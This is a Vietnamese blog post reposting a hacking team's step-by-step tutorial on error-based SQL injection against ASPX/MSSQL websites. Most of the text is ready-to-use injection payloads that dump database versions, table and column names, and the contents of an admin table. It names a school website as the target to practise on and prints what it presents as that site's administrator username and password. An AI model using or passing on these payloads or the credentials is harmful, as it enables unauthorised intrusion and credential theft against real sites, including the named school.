TIP KHAI THÁC SITE DẠNG ASPX

Kho template blogspot đẹp

------------------------------------ TUT KHAI THAC SITE DẠNG ASPX-------------------------------- Cũng giông như các dạng khác ta thêm dấu &...

------------------------------------
TUT KHAI THAC SITE DẠNG ASPX--------------------------------
Cũng giông như các dạng khác ta thêm dấu " ' " vào đuôi link hoặc vào thanh tìm kiếm của web site để biết site có lỗi hay không
----> victim cho các bạn test: thptnguyenthaibinh.edu.vn
~~~~~Làm từng bước theo tut nhé

++++Tim version: 'and 1=convert(int,(@@version))-- -


++++Tim database: 'and 1=convert(int,(db_name()))-- -


++++tim thong tin table:
'and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -         (1)


++++tim cac table khac table da tim dc o tren(1)
'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('các table t`im đc')))-- -


****tai sao phải them (((where table_name not in ))) ý nghĩa la tim các table khac ngoai cac  table da tim dc

----Tìm cho đến khi tìm đc cái table như: admin,user,....)thì dùng lại

@vd :'admin'
bay giờ tim ra admin r thi dừng lại (chưa t`im đc th`i cứ t`im ti^ếp)
----->tiếp theo ta:
++++Tìm thông tin table 'admin' vừa tìm đc

ta đang khai thác table 'admin'
nen dong lệnh sẽ thay đổi

'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin')))-- -

@ví dụ tim đc từ 'admin': là 'ID' thì:

----Ta làm tương tụ như ở trên
 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin') and column_name not(khác) in ('ID')))-- - delete từ khác đi nhé

Ta khai thác đến khi naò tìm đc :
-ở đây thì mình khai thác đc là :username và password
?:roi lam sao co user va pass
TA dùng lệnh cụ thể trong table username và password

'and 1=convert(int,(select top 1 username from admin))-- - để biết tài khoản
'and 1=convert(int,(select top 1 password from admin))-- - để biết mật khẩu

username: 'admin'
password: 'bongbi0917343846'

                                                                  %%%%%TUT VIẾT BỚI MINH TRỰC ---GLOOMY HACKING TEAM (GHT)%%%%%%
EDIT BY Jo3

Chủ bút: Bảo Khánh Blog

Bảo Khánh Blog, blog lưu giữ tất cả các bài viết hay trên mạng internet, từ tin tức công nghệ, cho đến sức khỏe, làm đẹp. Từ thủ thuật blogger cho đến Facebook

Có thể bạn sẽ thích

Có 0 nhận xét Post a Comment

Powered by Blogger.

Ngẫu Nhiên

Bình Luận

Popular

Liên Kết Bạn Bè